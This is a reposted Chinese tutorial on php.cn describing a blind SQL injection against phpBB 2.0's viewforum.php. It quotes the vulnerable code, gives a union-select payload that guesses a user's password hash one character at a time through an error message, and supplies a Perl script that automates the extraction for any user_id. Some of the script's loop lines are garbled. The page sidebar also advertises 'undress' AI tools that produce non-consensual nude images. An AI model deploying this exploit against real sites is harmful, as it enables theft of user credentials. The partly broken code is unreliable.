php注入实例-php手册-php.cn

Home

php教程

php手册

php注入实例

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 13, 2016 pm 12:44 PM

php code about use and exist whole Example article yes injection of

php注入实例在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期，下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS{
$forum_id = ( isset($HTTP_GET_VARS
($HTTP_POST_VARS}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话，相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话，就会使$result为空，于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长，就不全贴出来了,有兴趣的可以自已看看，关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE))，同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}

在这里有个session_page在mysql中定义的是个整形数,他的値$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数，插入的不是整数当然就要出错了，于是就显示Error creating new session : session_begin,就表明你猜对了第一位了，其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功，看来出错信息也很有帮助啊.分析就到这里，下面附上一段测试代码，这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件，中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ************************n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$jfor ($i=0;$i$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

至于最近的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了,如要错误请上www.icehack.com指正.

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

1 weeks ago By DDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

WWE 2K25: How To Unlock Everything In MyRise

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7454

CakePHP Tutorial

1375

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

Related knowledge

PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati

CakePHP Working with Database Sep 10, 2024 pm 05:25 PM

Working with database in CakePHP is very easy. We will understand the CRUD (Create, Read, Update, Delete) operations in this chapter.

CakePHP Date and Time Sep 10, 2024 pm 05:27 PM

To work with date and time in cakephp4, we are going to make use of the available FrozenTime class.

CakePHP File upload Sep 10, 2024 pm 05:27 PM

To work on file upload we are going to use the form helper. Here, is an example for file upload.

Discuss CakePHP Sep 10, 2024 pm 05:28 PM

CakePHP is an open-source framework for PHP. It is intended to make developing, deploying and maintaining applications much easier. CakePHP is based on a MVC-like architecture that is both powerful and easy to grasp. Models, Views, and Controllers gu

CakePHP Creating Validators Sep 10, 2024 pm 05:26 PM

Validator can be created by adding the following two lines in the controller.

CakePHP Logging Sep 10, 2024 pm 05:26 PM

Logging in CakePHP is a very easy task. You just have to use one function. You can log errors, exceptions, user activities, action taken by users, for any background process like cronjob. Logging data in CakePHP is easy. The log() function is provide

How To Set Up Visual Studio Code (VS Code) for PHP Development Dec 20, 2024 am 11:31 AM

Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c

See all articles